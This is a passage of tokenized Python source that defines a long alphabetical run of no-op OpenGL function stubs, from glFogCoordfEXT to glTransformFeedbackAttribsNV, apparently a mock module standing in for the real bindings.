glFogCoorddvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogCoordfEXT ( * args , ** 
kwargs ) : <EOL> pass <EOL> def glFogCoordfvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogf ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogi ( * args , ** kwargs ) : <EOL> pass <EOL> def glFogiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glFramebufferRenderbufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFramebufferTexture1DEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFramebufferTexture2DEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFramebufferTexture3DEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glFrontFace ( * args , ** kwargs ) : <EOL> pass <EOL> def glFrustum ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenBuffersARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenFencesNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenFragmentShadersATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenFramebuffersEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenLists ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenOcclusionQueriesNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenPrograms ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenProgramsNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenQueriesARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenRenderbuffersEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenSymbolsEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenTextures ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenVertexShadersEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGenerateMipmapEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetActiveAttribARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetActiveUniformARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetActiveVaryingNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetAttachedObjectsARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetAttribLocationARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetBooleanv ( * args , ** kwargs ) : <EOL> pass 
<EOL> def glGetBufferParameterivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetBufferPointervARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetBufferSubDataARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetClipPlane ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetCombinerInputParameterfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetCombinerInputParameterivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetCombinerOutputParameterfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetCombinerOutputParameterivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetCompressedTexImage ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetDoublev ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetError ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetFenceivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetFinalCombinerInputParameterfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetFinalCombinerInputParameterivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetFloatv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetFramebufferAttachmentParameterivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetHandleARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetInfoLogARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetIntegerv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetInvariantBooleanvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetInvariantFloatvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetInvariantIntegervEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetLightfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetLightiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetLocalConstantBooleanvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetLocalConstantFloatvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetLocalConstantIntegervEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetMapdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetMapfv ( * args , ** kwargs ) : <EOL> pass 
<EOL> def glGetMapiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetMaterialfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetMaterialiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetObjectParameterfvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetObjectParameterivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetOcclusionQueryivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetOcclusionQueryuivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetPixelMapfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetPixelMapuiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetPixelMapusv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetPointerv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetPolygonStipple ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramEnvParameterdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramEnvParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramLocalParameterdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramLocalParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramParameterdvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramParameterfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramString ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramStringNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetProgramivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetQueryObjectivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetQueryObjectuivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetQueryivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetRenderbufferParameterivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetShaderSourceARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetString ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexEnvfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexEnviv ( * args , ** kwargs ) : <EOL> pass 
<EOL> def glGetTexGendv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexGenfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexGeniv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexImage ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexLevelParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexLevelParameteriv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTexParameteriv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTrackMatrixivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTransformFeedbackVaryingEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetTransformFeedbackVaryingNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetUniformLocationARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetUniformfvARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetUniformivARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVariantBooleanvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVariantFloatvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVariantIntegervEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVariantPointervEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVaryingLocationNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribPointerv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribPointervNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribdvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribfvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glGetVertexAttribivNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glHint ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexMask ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexPointer ( * args , ** kwargs ) : <EOL> 
pass <EOL> def glIndexd ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexf ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexi ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexs ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexsv ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexub ( * args , ** kwargs ) : <EOL> pass <EOL> def glIndexubv ( * args , ** kwargs ) : <EOL> pass <EOL> def glInitNames ( * args , ** kwargs ) : <EOL> pass <EOL> def glInsertComponentEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glInterleavedArrays ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsBufferARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsEnabled ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsFenceNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsFramebufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsList ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsOcclusionQueryNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsProgram ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsProgramNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsQueryARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsRenderbufferEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def glIsVariantEnabledEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightModelf ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightModelfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightModeli ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightModeliv ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightf ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glLighti ( * args , ** kwargs ) : <EOL> pass <EOL> def glLightiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glLineStipple ( * args , ** kwargs ) : 
<EOL> pass <EOL> def glLineWidth ( * args , ** kwargs ) : <EOL> pass <EOL> def glLinkProgramARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glListBase ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadIdentity ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadMatrixd ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadMatrixf ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadName ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadProgramNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadTransposeMatrixd ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadTransposeMatrixdARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadTransposeMatrixf ( * args , ** kwargs ) : <EOL> pass <EOL> def glLoadTransposeMatrixfARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glLockArraysEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glLogicOp ( * args , ** kwargs ) : <EOL> pass <EOL> def glMap1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMap1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMap2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMap2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMapBufferARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glMapGrid1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMapGrid1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMapGrid2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMapGrid2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMaterialf ( * args , ** kwargs ) : <EOL> pass <EOL> def glMaterialfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMateriali ( * args , ** kwargs ) : <EOL> pass <EOL> def glMaterialiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMatrixMode ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultMatrixd ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultMatrixf ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultTransposeMatrixd ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultTransposeMatrixdARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultTransposeMatrixf ( * args , ** 
kwargs ) : <EOL> pass <EOL> def glMultTransposeMatrixfARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiDrawArrays ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiDrawElements ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1i ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1s ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord1sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2i ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2s ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord2sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4fv ( * 
args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4i ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glMultiTexCoord4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNewList ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3b ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3bv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormal3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glNormalPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glOrtho ( * args , ** kwargs ) : <EOL> pass <EOL> def glPNTrianglesfATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glPNTrianglesiATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glPassTexCoordATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glPassThrough ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelMapfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelMapuiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelMapusv ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelStoref ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelStorei ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelTransferf ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelTransferi ( * args , ** kwargs ) : <EOL> pass <EOL> def glPixelZoom ( * args , ** kwargs ) : <EOL> pass <EOL> def glPointParameterf ( * args , ** kwargs ) : <EOL> pass <EOL> def glPointParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glPointSize ( * args , ** kwargs ) : <EOL> pass <EOL> def glPolygonMode ( * args , ** 
kwargs ) : <EOL> pass <EOL> def glPolygonOffset ( * args , ** kwargs ) : <EOL> pass <EOL> def glPolygonStipple ( * args , ** kwargs ) : <EOL> pass <EOL> def glPopAttrib ( * args , ** kwargs ) : <EOL> pass <EOL> def glPopClientAttrib ( * args , ** kwargs ) : <EOL> pass <EOL> def glPopMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def glPopName ( * args , ** kwargs ) : <EOL> pass <EOL> def glPrimitiveRestartIndexNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glPrimitiveRestartNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glPrioritizeTextures ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramEnvParameter4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramEnvParameter4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramEnvParameter4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramEnvParameter4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramLocalParameter4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramLocalParameter4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramLocalParameter4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramLocalParameter4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameter4dNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameter4dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameter4fNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameter4fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameters4dvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramParameters4fvNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glProgramString ( * args , ** kwargs ) : <EOL> pass <EOL> def glPushAttrib ( * args , ** kwargs ) : <EOL> pass <EOL> def glPushClientAttrib ( * args , ** kwargs ) : <EOL> pass <EOL> def glPushMatrix ( * args , ** kwargs ) : <EOL> pass <EOL> def glPushName ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2dv ( * args , ** kwargs ) : <EOL> 
pass <EOL> def glRasterPos2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2i ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2s ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos2sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos3sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4i ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glRasterPos4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glReadBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def glReadPixels ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectd ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectdv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectf ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRecti ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectiv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRects ( * args , ** kwargs ) : <EOL> pass <EOL> def glRectsv ( * args , ** kwargs ) : <EOL> pass <EOL> def glRenderMode ( * args , ** kwargs ) : <EOL> pass <EOL> def glRenderbufferStorageEXT ( * args , ** 
kwargs ) : <EOL> pass <EOL> def glRequestResidentProgramsNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glRotated ( * args , ** kwargs ) : <EOL> pass <EOL> def glRotatef ( * args , ** kwargs ) : <EOL> pass <EOL> def glSampleCoverage ( * args , ** kwargs ) : <EOL> pass <EOL> def glSampleMapATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glScaled ( * args , ** kwargs ) : <EOL> pass <EOL> def glScalef ( * args , ** kwargs ) : <EOL> pass <EOL> def glScissor ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3bEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3bvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3dEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3dvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3fEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3fvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3iEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3ivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3sEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3svEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3ubEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3ubvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3uiEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3uivEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3usEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColor3usvEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSecondaryColorPointerEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSelectBuffer ( * args , ** kwargs ) : <EOL> pass <EOL> def glSetFenceNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glSetFragmentShaderConstantATI ( * args , ** kwargs ) : <EOL> pass <EOL> def glSetInvariantEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glSetLocalConstantEXT ( * args , ** kwargs ) : <EOL> 
pass <EOL> def glShadeModel ( * args , ** kwargs ) : <EOL> pass <EOL> def glShaderOp1EXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glShaderOp2EXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glShaderOp3EXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glShaderSourceARB ( * args , ** kwargs ) : <EOL> pass <EOL> def glStencilFunc ( * args , ** kwargs ) : <EOL> pass <EOL> def glStencilMask ( * args , ** kwargs ) : <EOL> pass <EOL> def glStencilOp ( * args , ** kwargs ) : <EOL> pass <EOL> def glSwizzleEXT ( * args , ** kwargs ) : <EOL> pass <EOL> def glTestFenceNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1d ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1f ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1i ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1s ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord1sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2d ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2f ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2i ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2s ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord2sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3d ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3f ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3i ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3s ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord3sv 
( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4d ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4dv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4f ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4fv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4i ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4iv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4s ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoord4sv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexCoordPointer ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexEnvf ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexEnvfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexEnvi ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexEnviv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGend ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGendv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGenf ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGenfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGeni ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexGeniv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexImage3D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexParameterf ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexParameterfv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexParameteri ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexParameteriv ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexSubImage1D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexSubImage2D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTexSubImage3D ( * args , ** kwargs ) : <EOL> pass <EOL> def glTrackMatrixNV ( * args , ** kwargs ) : <EOL> pass <EOL> def glTransformFeedbackAttribsNV ( * args , ** 